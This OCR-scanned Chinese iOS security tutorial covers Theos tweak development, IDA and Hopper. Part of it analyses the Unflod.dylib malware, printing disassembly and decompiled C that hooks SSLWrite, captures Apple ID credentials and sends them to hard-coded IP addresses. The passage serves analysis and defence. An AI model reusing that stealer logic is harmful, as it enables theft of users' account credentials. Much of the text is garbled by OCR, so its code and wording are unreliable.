Makefile ， Saneti ( 当 在 Cydia 中 时 ， 显 示 的 关于 程序 的 信息 ) 。 
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下 面 将 介绍 如 何 创 建 一 个 jailbroken app/tweak/hack 的 工具 ， 然 后 编译 和 上 传 到 设备 的 方法 。 


下 面 是 一 个 创建 jailbroken 应 用 程序 的 例子 


author$ $THEOS/bin/nic.pl 
NIC 1.0 - New Instance Creator 


[1.] iphone/application 

[2.] iphone/library 

[3.] iphone/preference bundle 
[4.] iphone/tool 


[5.] iphone/tweak 
Choose a Template (required): 1 
Project Name (required): firstdemo 
Package Name [com.yourcompany.firstdemo]: 
Author/Maintainer Name [Author Name]: 
Instantiating iphone/application in firstdemo/.. 
Done. 


这 将 会 创建 一 个 新 的 目录 firstdemo， 并 且 有 以 下 文件 。 


1. d —Á t 息 ， 当 你 从 Cydia 安 装 时 ， 你 可 以 看 到 这 些 信息 ， 包 括 
， 作 者 ， 版 本 ， 等 等 

main.m， 这 个 不 用 多 说 

[applicationName]Application.mm:appdelegate X4} ° 

Makefile : 包含 必要 的 编译 命令 

Resources : 包含 info.plist 文 件 等 
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RootViewController.h/mm 


Makefile 


REE ME 


include theos/makefiles/common.mk 

APPLICATION NAME - firstdemo 

[applicationName] FILES = main.m firstdemoApplication.mm RootViewController.mm 
[applicationName] FRAMEWORKS = UIKit Foundation QuartzCore AudioToolbox CoreGraphics 


export THEOS-/opt/theos/ 
export SDKVERSION=7.1 
export THEOS DEVICE IPZXXX.XXX.XXX.XXX 


第 二 行 定义 你 当前 的 SDK 版 本 ， 我 本 机 装 的 是 7.1， 最 后 一 你 的 设备 的 ip 地 址 。 
构建 工程 


第 一 个 命令 :make 


$ make 

Making all for application firstdemo.. 
Compiling main .m.. 
Compiling firstdemoApplication.mm... 
Compiling RootViewController .mm.. 
Linking application firstdemo.. 
Stripping firstdemo.. 

Signing firstdemo.. 


注意 ， 如 果 出 现 如 下 的 错误 : 


libsubstrate.dylib, missing required architecture armv/ in file 
/Users/mcmillen/test/theos/lib/libsubstrate.dylib (2 slices) 


解决 方法 : 
下 载 libsubstrate.dylib， 然 后 copy 到 /opt/theos/lib 
第 二 个 命令 : make package 


make package 
Making all for application firstdemo... 
make[2]: Nothing to be done for 'internal-application-compile'. 
Making stage for application firstdemo.. 
Copying resource directories into the application wrapper... 
dpkg-deb: building package ‘com.yourcompany.firstdemo’ in '/Users/author/Desktop/firstdem 
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第 三 个 命令 : make install 


$ make package install 
Making all for application firstdemo.. 
make[2]: Nothing to be done for "internal-application-compile'. 
Making stage for application firstdemo.. 
Copying resource directories into the application wrapper.. 
dpkg-deb: building package ‘com.yourcompany.firstdemo’ in '/Users/author/Desktop/firstdem 


rootQip's password: 
a] m | 


这 个 过 程 会 提示 你 输入 几 次 ijphone 或 者 ipad 的 密码 。 默 认 有 是 :alpine. 





make install 报 错 解决 方法 
如 果 执 行 make install 提 示 错 误 : 


make: *** [internal-install] Error 1 


4% $| x TfF$THEOS/makefiles/package/deb.mk > 4e # F 49 


$(ECHO NOTHING)COPYFILE DISABLE-1 $(FAKEROOT) -r dpkg-deb -b "$(THEOS STAGING DIR)" "$( T 
[d ee] 


替换 为 : 





$(ECHO NOTHING)COPYFILE DISABLE-1 $(FAKEROOT) -r dpkg-deb -Zgzip -b "$(THEOS_STAGING_DIR) 
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然后 再 次 执行 make install 就 可 以 正 第 安装 了 。 


你 的 第 一 个 Tweak 程 序 


这 一 节 将 介绍 如 何 给 任意 的 Apple 提 供 的 方法 打 补 丁 。 在 这 个 demo 中 ， 我 们 将 要 hook 
Springboard 的 init 方 法 ， 然 后 在 iphone 局 动 时 显示 一 个 UIAlertView。 这 个 demo 不 是 最 酪 的 ， 
但 是 这 里 所 使 用 的 方法 和 模式 ， 可 以 用 来 给 任何 class 的 任何 method 打 补丁 。 


1 准备 工作 
你 首先 还 需要 下 载 libsubstrate.dylib， 然 后 copy 到 /opt/theos/lib 


T &ulibsubsrate.dylib 


2iOS X: xt 


很 可 能 theos 本 身 就 日 带 了 你 所 需要 的 头 文 件 ， 但 是 ， 如 果 你 编译 程序 的 时 候 提 示 你 头 文件 相 
关 的 问题 ， 那 你 就 需要 准备 相关 的 头 文件 了 。 


TF £&iphoneheader£l/opt/theos/include : 


git clone https://github.com/rpetrich/iphoneheaders.git 
mv iphoneheaders/* theos/include/ 


上 述 操 作 之 后 截图 如 下 : 


L3 include 


HS fum] [m-) [&-] Le) (e) a 
View Arrange Action Share Edit Tags Search 
include 
cj Disk "^ i Applications > a cisco F Eg bin £3 Fallback 
(© Network Fr mE Library * E local r 65 documentation L3 AccountSettings , 
Remote Disc rJ opt r D theos > LS extras L3 ActorKit P 
D System " ag xil "CERTE 四 ApplaPECsemice P 
Gj Users j £3 lib c3 AppSupport 
| LICENSE iv Availability2.h 
E makefiles L3 CaptainHook 
ES mad L3 Celestial 
A Prefix.pch L3 ChatKit 


J CoreGraphics 


4 CoreText 
| Data&ccess 
—3 DAVKit 
i DHCommon.h 
DHHoaokCommon.h 
Flipswitch a 
3 Foundation P 
` GenerateAvailability2.d 
L3 GraphicsServices j 
3 HapticPro F 
E hunspell 
LD ImagelO , 
L3 IOKit Us 
: P 
I 
r 
F 


P 

P 

I 
L3 templates —J CoreFoundatian i 
f F 

P 

I 

F 


t3 IOSurface 

L3 JavaScriptCore 
L3 EON 

L4 libactivator 
h tiblockdewn.h 
— logos 

L3 MediaPlayer 
[| Message 

L3 Messagelll 
L3 MIME 

L3 MusicLibrany 
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从 OSX library * 45 Jt |OSurfaceAPI.h£Zltheos/include/IOSurface BH 3€ F : 


cp /System/Library/Frameworks/IOSurface.framework/Headers/IOSurfaceAPI.h theos/include/ 
a] | 


25 |OSurfaceAPI.hdT 2l T > i ft4*lOSurfaceCreateXPCObject 和 
lOSurfaceLookupFromXP CObject ° 





注释 后 的 结果 十 : 


/* This call lets you get an xpc object t that holds a reference to the IOSurface. 
Note: Any live XPC objects created from an IOSurfaceRef implicity increase the IOSurfa 
count by one until the object is destroyed. */ 


/*xpc object t IOSurfaceCreateXPCObject(IOSurfaceRef aSurface) XPC RETURNS RETAINED 
IOSFC AVAILABLE STARTING( MAC 10 7, X IPHONE NA);*/ 


/* This call lets you take an xpc object t created via IOSurfaceCreatePort() and recreate 
/*IOSurfaceRef IOSurfaceLookupFromXPCObject(xpc object t xobj) CF RETURNS RETAINED 

IOSFC AVAILABLE STARTING( MAC 10 7, X IPHONE NA); 
D 
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3 创建 项 目 


执行 $THEOSJ/bin/nic.pl 


author$ $THEOS/bin/nic.pl 
NIC 1.0 - New Instance Creator 


[1.] iphone/application 

[2.] iphone/library 

[3.] iphone/preference bundle 
[4.] iphone/tool 

[5.] iphone/tweak 


这 里 ， 需 要 选择 5， 如 下 


NIC 1.0 - New Instance Creator 


[1.] iphone/application 

[2.] iphone/library 

[3.] iphone/preference bundle 

[4.] iphone/tool 

[5.] iphone/tweak 
Choose a Template (required): 5 
Project Name (required): iossecurity 
Package Name [com.yourcompany.iossecurity]: 
Author/Maintainer Name [Ted]: 
MobileSubstrate Bundle filter [com.apple.springboard]|: 
Instantiating iphone/tweak in iossecurity/.. 
Done. 


4 The Tweak File 


一 旦 你 创建 了 项 目 ， 你 会 发 现 Theos 生 成 了 一 个 叫做 Tweak.xm 的 文件 ， 这 是 个 特殊 的 文件 ， 
hook 的 相关 代码 就 将 写 在 这 个 文件 。 


默认 的 所 有 代码 都 是 被 注释 起 来 的 。 


%hook 和 %end 


?$hook Springboard 
// overwrite methods here 
%end 


%hook 后 面 跟 的 是 你 要 hook 的 类 名 称 ， 以 一 个 %end 结 尾 。 上 面 的 代码 说 明 我 们 会 hook 
Springboard 类 里 面 的 method ° 


%orig 
当 在 一 个 method 内 部 的 时 候 ，%orig 会 调用 原来 的 方法 (original method)。 


你 甚至 可 以 给 原来 的 method 传 递 参数 ， 例 如 : %orig(arg1,arg2)。 如 果 你 不 调用 %orig， 原 来 
的 方法 就 绝对 不 会 被 调用 。 


所 以 ， 如 果 你 hook 了 SpringBoard 的 init 方 法 ， 但 是 没有 调用 %orig。 那 么 你 的 iphone 就 将 不 可 
用 ， 除 非 你 通过 ssh 删 除 你 的 app。 


5 Hooking into Springboard 


打开 Tweak.xm， 然 后 加 上 代码 : 


#import <SpringBoard/SpringBoard.h> 
%hook SpringBoard 


-(void)applicationDidFinishLaunching:(id)application { 
?60r 19; 


UIAlertView *alert = [[UIAlertView alloc] initWwithTitle:Q'"Welcome" 
message:@"Welcome to your iOS Device Ted!" 

delegate:nil 

cancelButtonTitle:Q"security.ios-wiki.com" otherButtonTitles:nil]; 


[alert show]; 
[alert release]; 


} 


%end 
首先 ，import 头 文件 Springboard.h， 这 可 以 让 我 们 可 以 访问 springboard。 然 后 ， 我 们 告诉 预 
xb 3€ 25 hook Springboard class ° 


ix 9 i$ 3 4 method <applicationDidFinishLaunching : 77K * 4 Springboard È z^ it > HARK 
执行 。 注 意 我 们 调用 了 %orig。 


最 后 ， 显 示 一 个 UlAlertView 。 


6 ZxZ«Framework 


如 果 你 直接 编译 ，， 会 得 到 如 下 的 提示 信息 : 


Tweak.xm: In function 'objc object* $ ungrouped$SpringBoard$init(SpringBoard*, objc selec 
Tweak.xm:6: error: declaration of ‘objc_object* self’ shadows a parameter 
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那 是 因为 我 们 依靠 UIKit framework 来 显示 alert, 所 以 需要 在 Makefile 中 加 上 如 下 一 行 : 


iossecurity FRAMEWORKS = UIKit 


如 下 图 : 


Sublime Text 2 File Edit Selection Find View Goto Tools Pre 








Makefile e Tweak.xm x 


include theos/makefiles/common.mk 


1 

P 

3 TWEAK_NAME = iosecurity 

4  iosecurity FILES = Tweak. xm 


iosecurity FRAMEWORKS = UIKit 


include $(THEOS. MAKE. PATH) /tweak.mk 


after-install:: 
install.exec "killall -9 SpringBoard" 


7 Building, Packaging, Installing. 
在 前 面 的 系列 中 介绍 了 如 何 编译 ， 打包 和 安装 ， 依 次 执行 下 面 的 命令 即 可 。 


make, make package, make install 


ZPs-MBP: iosecurity a 
Making all for tweak 10se Or 
Preprocessing Tweak.xm... 
Compiling Tweak.xm... 
Linking tweak iosecurity... 
Stripping iosecurity... 
Signing iosecurity.. 
ZPs-MBP:iosecurity adr 
Making all for tweak iu , fess 
make[2]: Nothing to be done for 'internal-library-compile'. 
Making stage for tweak iosecurity... 
dpkg-deb: building pac 
ZPs-MBP:iosecurity ad 
instaLL.exec "cat > /tip Y 7 cb; dpkg -i /tmp/ theos install.deb && rm /tmp/ theos install.deb" < "./com.yourcompany.iosecurity 0.0. 
rm.deb" 
root@10.68.141.146's password: 
(Reading database ... 3404 files and directories currently installed.) 
Preparing to replace com.yourcompany.iosecurity 0.0.1-2 (using /tmp/ theos install.deb) ... 
Unpacking replacement com.yourcompany.iosecurity ... 
Setting up com. yourcompany.iosecurity (0.0.1-3) ... 
install.exec "killall -9 SpringBoard" 
root@10.68.141.146's password: 


y.iosecurity' in './com.yourcompany.iosecurity 0.0.1-3 iphoneos-arm.deb'. 





安装 之 后 ， 你 将 看 到 这 个 : 


IC) ZA Mlle 
IOS 3c Wiki 
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Welcome 


Welcome to your IOS Device Ted! 

















security.los-wiki.com 





本 节 我 们 简要 介绍 了 Theos 的 安装 与 Tweak 程 序 的 开发 以 及 安装 流程 ， 并 给 出 了 一 个 小 例子 ， 
后 面 会 对 Tweak 程 序 运 行 的 原理 进行 详细 的 介绍 。 


#3 Mac 上 需要 安装 的 工具 下 的 更 多 文章 


IDA 是 一 个 非常 强大 的 反 汇 编 和 调试 工具 ， 支 持 Windows,Linux Mac OS X 平 台 ， 它 支持 太 多 
的 功能 了 ， 以 至 于 其 作者 都 不 能 在 官方 网 站 上 对 其 进行 详细 的 描述 。 


正式 版 本 是 需要 收费 的 ， 正 因为 其 功能 强大 ， 收 费 也 非常 贵 。 不 过 ， 它 有 试用 版 本 可 以 下 
载 ， 从 这 找到 IDA demo download ° 4434 T RIDA Demo 6.5 for Mac ° 


下 载 之 后 解压 并 运行 ， 出 现 如 下 的 示意 图 : 
e 00 VP About 


IDA - The Interactive Disassembler 


Version 6.5.140124 (32-bit) 





(c) 2014 Hex-Rays SA 
Evaluation version 

with the following limitations: 
1. Only PE/ELF/Mach-O files are supported 
2. It is time limited 
3. Save is disabled 


www.hex-rays.com 


过 几 秒 会 马上 提示 是 否 同意 IDA 协 议 ， 点 击 "agree'" : 


aoe OF IDA License 


IDA License Agreement 
SPECIAL DEMO VERSION LICENSE TERMS 


This demo version of IDA is intended to demonstrate the capabilities 
of the full version of IDA whose license terms are described 

hereafter. The demo version of IDA may not, under any circumstances, 
be used in a commercial project. 


The IDA computer programs, hereafter described as "the software" 
are licensed, not sold, to you by Hex-Rays SA pursuant to the 
terms and conditions of this Agreement. Hex-Hays SA reserves any 
right not expressly granted to you. You own the media on which the 
software is delivered but Hex-Hays SA retains ownership of all 
copies of the software itself. The software is protected by copyright 
law. 


The software is licensed on a "per user" basis, Each copy of the 
software can only be used by a single user at a time. This user may 
install the software on his office workstation, personal laptop and 

home computer, provided that no other user uses the software on those 
computers. This license also allows you to 


Make as many copies of the installation media as you need for backup 
or installation purposes. Reverse-engineer the software. Transfer the 
software and all lots under this licanse to an other party together 
with a copy of this license and all material, written or electronic, 
accompanying the software, provided that the other party reads and 
accepts the terms and conditions of this license. You lose the right 
to use the software and all other rights under this licanse when 
transferring the software. 


Restrictions 

You may not distribute copies of the software to another party or 
electronically transfer the software from one computer to another if 
one computer belongs to another party. 


You may nat modify, adapt, translate, rent, lease, resell, distribute, 





| lAgree | 
然后 会 出 现 Quick Start > 4 FA: 
eoo O9 IDA: Quick start 


New | Disassemble a new file 


Go | Work on your own 





Previous Load the old disassembly 





Display at startup 


先 择 其 中 的 “New”， 然 后 根据 提示 选择 你 需要 分 析 的 文件 ， 就 可 以 体验 IDA 的 功能 了 。 


使 用 IDA 分 析 iOS 悉 意 软 件 Unflod 


tdvx 在 Reddit 上 发 帖 说 : 从 上 周 起 ， 他 用 Snapchat 和 Google Hangouts 的 使 用 经 第 遇 到 
crash， 经 过 排查 ， 他 发 现 是 下 面 这 个 可 疑 文件 导致 的 : 


/Library/MobileSubstrate/DynamicLibraries/Unflod.dylib 


这 个 恶意 文件 位 于 : /Library/MobileSubstrate/DynamicLibraries/Unflod.dylib 或 者 


framework.dylib。 依 赖 于 MobileSubstrate， 只 在 越狱 设备 上 起 作用 。 
从 http://deev.es/9xq1 可 以 下 载 改 和 恶意 代码 的 样本 ， 下 载 需 谨 惯 操作 。 


ZN 


下 载 到 本 地 之 后 ， 用 IDA 打 开 ， 打 开会 出 现 如 下 图 的 提示 ， 点 击 确 定 即 可 。 





GP IDA v6.5.140124 
Bh 9. 5, & HE BSB tis là GO MBBS Fr ex dX PDO Jt om e FF 
e0o0 € Load a new file 


Load file /Users/admin/Desktop/chapter3/ida/Unflod.dylib as 


Mach-O file (DYLIB). ARMv7 [macho.Imc] 


Processor type 
MetaPC (disassemble all opcodes) [metapc] E Set 
Analysis 
Loading segment Ox00000000 V Enabled 
Loading offset 0x00000000 © Indicator enabled 


Options 
vV Create segments 
Load resources 
区 Rename DLL entries 
Manual load Kernel options 2 
V Fill segment gaps 


Kernel options 1 


Loading options 


Processor options 
Create FLAT group 
[E] Output window | 2600 
一 一 一 
DLL directory c^windows | 
bytes pages size description 
262144 32 8192 allocating memory for b-tree... 
1920 10 8192 allocating memory for virtual array. Help Cancel |— OK... 
262144 32 8192 allocating memory for name pointers.. 3 J 


606208 total memory allocated 






ng processor module /Users/admin/Downloads/idaq.app/Conten! 
inboamnivada subsystem has been initialized. 


Possible file format: Mach-O file (DYLIB). ARMv7 (/Users/admin/Downloads/idag.app/Contents/MacOS/loaders/macho. inc) 


IDC 
@:00000000 Down 


Jta RAR ERU FAK ^ VAS dEOption F 8 FA > E RA A K Sizeix — 9| PX o de TF A 
所 示 : 


yl General... iers/admin/Desktop/chapter3/ida/Unflod.dylib 
Colors... 

Font... 

P? Shortcuts... 

Assembler directives... 











Name representation... 
Demangled names... 
Compiler... 

ASCII string style... 


Setup data types... . Stack chk guard ptr ~ O0xB02) ; stack chk gua 
; Stack chk guard ptr 


Source paths... 
Binary paths... 





ects/MZFinance.woa/wa/aut! 
ce.woa/wa/authentica"... 








MingLiU HKSCS-ExtB 
Monaco . 
Preview. 











ip 


l— yee 5 se “it loc B68 
RO, #(_findhead - 0xB76) ;  findhead 





其 中 一 个 API 叫 做 replace_SSLWrite， 如 下 图 所 示 : 
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iOS 24 Wiki 


eoo §¥ IDA - /Users/admin/Desktop/chapter3/ida/Unflod.dylib 
S 日 :ov 9.78 8 8.05 ion AO diui t yk ud X »00( JETER 3 
(V anii — ^1 —á-——— e eR : 





. Library function Ñ Data 
7] Function... 0 6 Q 





@ =] Enums @ 5 Imports @ (| Exports 

















.. text:00000AFO0 var : = -0xC 
. text:00000AFO0 
^ | text:00000AFO0 PUSH (R7,LR) 
^ ^ text:00000AF2 MOV R7, SP 
"^ | text:00000AF4 SUB SP, SP, #0x98 
^ | text:00000AF6 MOV R9, $( stack chk guard ptr -~ 0xB02) ; & stack chk guard ptr 
^ | text:00000AFE ADD R9, PC ; . stack chk guard ptr 
^ | text:00000B00 LDR.W RS, [R9] ; _ stack chk guard 
^ | text:00000B04 LDR.W R9, [R9] 
* ^ text:00000B08 STR.W R9, [SP,#0xA0+var_C] 
^ | text:00000BO0C MOV R9, #(_findhead - OxB18) ;  findhead 
" | text:00000B14 ADD R9, PC ; _findhead 
"^ | text:00000B16 STR RO, [(SP,S$0xAO*var 14] 
^ | text:00000B18 STR Rl, [(SP,$0xAO*var 18] 
* ^ text:00000B1A STR R2, [SP,$0xAO*var 1C] 
^ | text:00000B1C STR R3, [SP,#0xA0+var_20] 
^ | text:00000B1E LDR.W RO, [R9] 
" | text:00000B22 CMP RO, #0 
= | text:00000B24 BNE loc B6A 
|f | close ^ | text:00000B26 MOV R1, $( auth - OxB32) ; "/WebObjects/MZFinance.woa/wa/authentica"... 
f| connect ^ | text:00000B25 ADD R1, PC ; "/WebObjects/MZFinance.woa/wa/authentica"... 
F| inet addr "^ | text:00000B30 LDR RO, [SP,$0xAO*var 18] ; char * 
= "text :00000B32 BLX _strstr 
了 | socket * “text :00000B36 MOVS R1, $0 
.f | _streat ^ | text:00000B3C STR RO, (SP,$0xAO*var 24] 
F| _strepy ^ | text:00000B3E LDR RO, [SP,$0xAO-*var 24] 
F| _strlen ^ | text:00000B40 CMP RO, R1 
Få  atretr ^ | text:00000B42 BEQ loc B68 
m ^" | text:00000B44 MOV RO, #( content - OxB50) ; content 
.£ | -write * | text:00000B4C ADD RO, PC ; content ; char * 
^ | text:00000B4E MOVS R1, #1 
"^ | text:00000B54 MOV R2, #(_findhead - OxB60) ; _findhead 
"^ | text:00000B5C ADD R2, PC ; _findhead 
” | text:00000B5E STR R1, [R2] 
^ | text:00000B60 LDR R1, (SP,$0xAO0*var 18] ; char + 
"^ | text:00000B62 BLX _strepy 
^ | text:00000B66 STR RO, [SP,$0xAO-*var 64] 
_ text:00000B68 
.. text:00000B68 loc B68 ; CODE XREF: replace SSLWrite*52'j 
^ | text:00000B68 B loc B6A 
|, text:00000B6A ; -~------ 一 一 -一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
_ text:00000B6A 
. text:00000B6A loc B6A ; CODE XREF: replace SSLWrite-*34'j 
.. text:00000B6A ; replace SSLWrite:loc B68'j 
Line 1 of 23 00000804 00000804: replace SSLWrite--14 
eoo §¥ IDA - /Users/admin/Desktop/chapter3 /ida/Unflod.dylib 
pix €, >, 5 9; & V. we [A4 Q4 ag ..x*ux o» ua! J te mr 
: V wn ——— 1] Ium" DR 








. . Library function ® Data ffi Regular function 
F] Function... O 6 © 











Pe qo) Hex View-A Enums 





Qf Exports 





@ (Al Structures o5 e Imports 











.. text:00000B6A 
. text:00000B6A loc B6A ; CODE XREF: replace SSLWrite*34'j 
.. text:00000B6A ; replace SSLWrite:loc B68'j 
_Systemasminitialize : .. text:00000B6A MOV RO, #(_findhead - 0xB76) ; _findhead 
stub_helpers __text:00000B72 ADD RO, PC ; _findhead 
Ec © ' text:00000B74 LDR RO, [RO] 
„Í | -close 0 * text:00000B76 CMP RO, #1 
_connect_0 * ' text:00000B78 BNE.W loc E00 
.jnet addr 0 ^ | text:00000B7C MOV R1, #(_appleId - OxB88) ; "«key»appleId«/key»" 
月 socket 0 ^ | text:00000B84 ADD R1, PC ; "«key»appleId«/key»" 
 strcat 0 = | text:00000B86 LDR RO, [SP,$0xAO0*var 18] ; char * 
» - = | text:00000B88 BLX  strstr 
f | _strepy_0 = | text:00000B8C MOV R1, $( password - OxB98) ; “<key>password</key>" 
strien 0 "^ | text:00000B94 ADD R1, PC ; “<key>password</key>" 
 strstr 0 = | text:00000B96 STR RO, [SP,f$OxAO*var 28] 
F| write 0 = | text:00000B98 LDR RO, [SP,f$OxAO*var 18] ; char * 
"MSHookFuncti " | text:00000B9A BLX _strstr 
LA -MSrookFunction * “text :00000B9E MOVS R1, #0 
Lf | _stack_chk_fail © — text:00000BA4 STR RO, [SP,#0xA0+var_2C] 
F| close * — text:00000BA6 LDR RO, [SP,#0xA0+var 28] 
F| connect ^ “text: 00000BA8 CMP RO, R1 
inet. addr ^ | text:00000BAA BEQ.W loc DFE 
a ^.  text:00000BAE MOVS RO, #0 
J} -socket * — text:00000BB4 LDR R1, [SP,#0xA0+var_ 2C] 
f | _streat ^ | text:00000BB6 CMP R1, RO 
.Strcpy ^ | text:00000BB8 BEQ.W loc DFE 
strien ^ | text:00000BBC MOV RO, 4$( content - OxBC8) ; content 
ye "^ | text:00000BC4 ADD RO, PC ; content ; char * 
e "^ | text:00000BC6 LDR R1, [SP,f$O0xAO*var 18] ; char * 
Lf | write * — text:00000BC8 BLX _streat 
^" | text:00000BCC MOV R1, 4$( content - OxBD8) ; content 
= | text:00000BD4 ADD R1, PC ; content 
" | text:00000BD6 MOV R2, #(aPlist - OxBE2) ; “</plist>" 
" | text:00000BDE ADD R2, PC ; "«/plist»" 
" | text:00000BEO STR RO, (SP, #0xA0+var_68] 
^ | text:00000BE2 MOV RO, R1 ; char * 
"^ | text:00000BE4 MOV Rl, R2 ; char * 
"^ | text:00000BE6 BLX _strstr 
^ | text:00000BEA MOVS R1, #0 
"^ | text:00000BFO0 STR RO, [SP,$0xAO*var 30] 
^ | text:00000BF2 LDR RO, [SP,$0xAO*var 30] 
^ | text:00000BF4 CMP RO, R1 
* — text :00000BF6 BEQ loc C16 
^ | text:00000BF8 MOV RO, 4$( content - OxC04) ; content 
Line 1 of 23 00000B7C 00000B7C: replace SSLWrite«8C 
\U: idle Down Disk: 69GB 


使 用 IDA 的 插件 F5 一 下 ， 可 以 得 到 如 下 的 代码 : 


6 


int — fastcall replace SSLWrite(int a1, char *a2, int a3, int a4) 


{ 


if ( !findhead ) 


{ 
v19 = strstr(v22, "/WebObjects/MZFinance.woa/wa/authenticate HTTP/1.1"); 
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if ( v19 ) 


findhead = 1; 
strcpy(content, v22); 
} 


J 

if ( findhead == 1 ) 

{ 
v18 strstr(v22, "<key>appleId</key>"); 
v17 strstr(v22, "<key>password</key>"); 
if ( v18 ) 


if ( v17 ) 
{ 
strcat(content, v22); 
v16 = strstr(content, "</plist>"); 
if ( v16 && v16 - content <= 2040 ) 
v16[8] = 0; 
v14 = 0; 
v15 = socket(2, 1, 0); 
if ( v15 <0 ) 


v24 = pSSLWrite(v23, v22, v21, v20); 
goto LABEL 20; 


vi1i3.sa family = 2; 

*(_WORD *)&vi3.sa data[0] = OxC61Eu; 

*( DWORD *)&vi3.sa data[2] = inet addr("23.88.10.4"); 
if ( connect(vi15, &v13, Ox10u) < O ) 


close(v15); 
v24 = pSSLWrite(v23, v22, v21, v20); 
goto LABEL_20; 
j 
v5 = v15; 
v6 strlen(content); 
V14 = write(v5, content, v6); 
vii = 0; 
close(v15); 
v12 = socket(2, 1, 0); 
if ( v12 « 0 ) 


v24 = pSSLWrite(v23, v22, v21, v20); 
goto LABEL 20; 


v10.sa family = 2; 

*(_WORD *)&vi10.sa data[0] = OxC61Eu; 
*( DWORD *)&vi10.sa data[2] = inet_addr ("23.228.204.55"); 
if ( connect(v12, &v10, Ox10u) < O ) 


close(vi12); 
v24 = pSSLWrite(v23, v22, v21, v20); 
goto LABEL_20; 

j 

v? v12; 

v8 strlen(content); 

V11 - write(v7, content, v8); 

close(v12); 

findhead = 2; 

j 


j 


v24 = pSSLWrite(v23, v22, v21, v20); 
LABEL 20: 
if ( | stack chk guard !- v25 ) 
. Stack chk fail( stack chk guard, v24, v25, v4); 
return v24; 


j 


这 个 恶意 代码 通过 Hook Security.framework 的 SSLWrite 方 法 (Hook $% žr% 

replace SSLWrite) > Apple ide 2545 > Ae de 3x Le ERIK 8| IP 73 23.88.10.4 ` 
3.228.204.55 > 3 0 7 7878 89 IR 2-25 o. (端口 为 7878， 也 就 是 上 面 的 0xC61Eu。 注意 ， 这 里 
x big endian 模 式 。 所 以 ， 端 口 其 实 是 0x1EC6, 即 7878。) 


这 个 恶意 软件 被 iPhone 开发 者 证 书签 名 。 签 名 信息 如 下 : 


$ codesign -vvvv -d Unflod.dylib 

Executable-./Unflod.dylib 

Identifier=com. your .framework 

Format-Mach-O thin (armv7) 

CodeDirectory v-20100 size-227 flags-O0xO(none) hashes=3+5 location=embedded 
Hash type=shal size-20 
CDHashzda792624675e82b3460b426f869fbe718abea3f9 

Signature size-4322 

Authority-iPhone Developer: WANG XIN (P5KFURM8M8 ) 

Authority=Apple Worldwide Developer Relations Certification Authority 
Authority=Apple Root CA 

Signed Time=14 Feb 2014 04:32:58 

Info.plist=not bound 

Sealed Resources=none 

Internal requirements count=2 size=484 


需要 注意 的 是 ， 这 并 不 表示 这 个 人 就 是 这 个 事情 的 始作俑者 。 这 个 人 可 能 是 假冒 的 ， 也 可 能 
是 其 证 书 被 偷 穷 ， 也 可 能 是 真正 涉及 到 这 个 事情 ， 人 但是， 我 们 没有 办 法 知道 ， 但 是 ， 羊 果 需 

要 调查 这 个 事情 。 

解决 方法 


如 果 你 的 设备 上 有 Unflod.dylib/framework.dylib 这 两 个 文件 ， 把 其 删 反 ， 然 后 重新 设置 Apple 
ide BAS s, v] VA T o 


关于 IDA 的 F5 


IDA 中 有 一 个 插件 Hex-Rays.Decompiler， 其 快捷 键 是 F5， 该 插件 可 以 轻易 的 把 IDA 中 的 汇编 
代码 转 成 C 代 码 ， 如 上 面 的 replace SSLWrite 所 示 ， 即 使 没有 一 点 汇编 基础 的 人 都 可 以 反 汇 编 
了 。 这 个 功能 太 强 大 ， 大 家 就 把 使 用 这 个 播 件 把 汇编 转 成 C 代 码 的 过 程 叫做 F5 一 下 。 


请 注意 ，F5 播 件 是 需要 花 钱 买 的 ， 上 面 转 成 的 代码 ， 是 别人 转 的 ， 使 用 今天 下 载 的 试用 版 
本 ， 是 没有 F5 这 个 功能 的 ， 这 也 可 以 理解 ， 否 则 很 多 人 应 该 都 没 必 要 去 花 钱 买 正 式 版 本 了 。 
The IDA Pro book 


它 功 能 太 强 大 ， 都 可 以 写 一 本 书 专 门 来 介绍 它 ， 事 实 上 ， 确 实 存 在 这 么 一 本 书 The IDA Pro 
book, 2nd edition, 这 本 书 有 中 文 翻译 IDA Pro 权 威 指南 (第 2 版 ) 


本 节 简 要 介绍 了 如 何 下 载 是 使 用 IDA， 更 强大 的 功能 需要 渎职 自己 去 探索 ， 有 兴趣 的 话 可 以 找 
下 文中 提 到 的 The IDA Pro book 这 本 书 读 读 ， 然 后 实践 下 。 


#3 Mac 上 需要 安装 的 工具 下 的 更 多 文章 


上 一 节 我 们 介绍 了 IDA， 这 里 我 们 介绍 另 一 款 反 汇编 工具 : Hopper’ CAOS X 和 Linux 版 本 ， 
能 够 反 汇 编 32/64 位 Mac，Linux，Windows 和 iOS 可 执行 文件 。 
Hopper Disassembler v3 - Personal License 版 本 在 中 国 售 价 580.0178 51 FIDA X 2528 2: f 


E 


FL Oo 
本 文 我 们 将 使 用 是 demo 版 本 ， 可 以 从 这 里 下 载 。 


下 载 完成 之 后 ， 解 压 安装 。 


有 反 汇 编 举 例 
我 们 编写 一 个 demo ， 在 ViewDidLoad 中 调用 UlAlertView， 代 码 如 下 : 


- (void)viewDidLoad 
[super viewDidLoad]; 


UIAlertView *alert - 
[[UIAlertView alloc] initwithTitle:@"Welcome" 
message:Q"Welcome to your iOS Device Ted!" 
delegate:nil 
cancelButtonTitle:Q"security.ios-wiki.com" 
otherButtonTitles:nil]; 


[alert show]; 


J 
——Urá—————————M—"———— — " 
v5 AlertDemo a) ff 

— 2 targets, iOS SDK 7.1 2 // VWiewController.m 
¥ | AlertDemo 3 // AlertDemo 
Ji AppDelegate.h 4 
I T 5 
am AppDelegate.m // 


= Main.storyboard 











Soak i n F 
NAOT a #import "ViewController.h" 
mm 7 a a 
ij Images.xcassets : (interface ViewController () 
i| | Supporting Files 11 
¥ |) AlertDemoTests 12 (Bend 
i AlertDemoTests.m 13 
> (=) Supporting Files x Gimplementation ViewController 
> | Frameworks m - . 
> E Products : ; (void )viewDidLoad 
18 [super viewDidLoad]; 
19 // Do any additional setup after loading the view, typically from a nib. 
UIAlertView alert = 
H [[UIAlertView alloc] initWithTitle:@"Welcome" 
H message:@"Welcome to your i05 Device Ted!" 
N delegate:nil 
25 cancelButtonTitle:g"security.ios-wiki.com" 
26 btherButtonTitles:nil]; 
28 [alert show]; 


- (void)didReceiveMemoryWarning 
i 
[super didReceiveMemoryWarningl; 


15 // Dispose of any resources that can be recreated. 
! 


: end 


